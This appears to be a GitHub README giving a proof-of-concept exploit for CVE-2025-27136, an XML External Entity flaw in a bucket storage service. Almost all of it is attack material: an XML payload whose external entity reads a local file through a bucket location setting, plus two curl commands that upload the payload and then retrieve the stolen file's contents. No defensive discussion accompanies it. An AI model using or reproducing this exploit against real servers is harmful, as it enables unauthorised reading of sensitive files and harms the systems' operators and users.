README.md
Rendering markdown...
# CVE-2025-27136
Exploiting an XML External Entity (XXE) Vulnerability.
### Use XML Payload to Grab Sensitive Files (PoC)
*test.xml*
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///path/to/file">
]>
<CreateBucketConfiguration>
<LocationConstraint>&xxe;</LocationConstraint>
</CreateBucketConfiguration>
```
Use curl to upload *test.xml* from our local machine to the bucket.
```
curl -X PUT http://127.0.0.1:PORT/TB1 -H "Content-Type: application/xml" -d @test.xml
```
Trigger the Exploit & Grab the File
```
curl http://127.0.0.1:PORT/TB1?location
```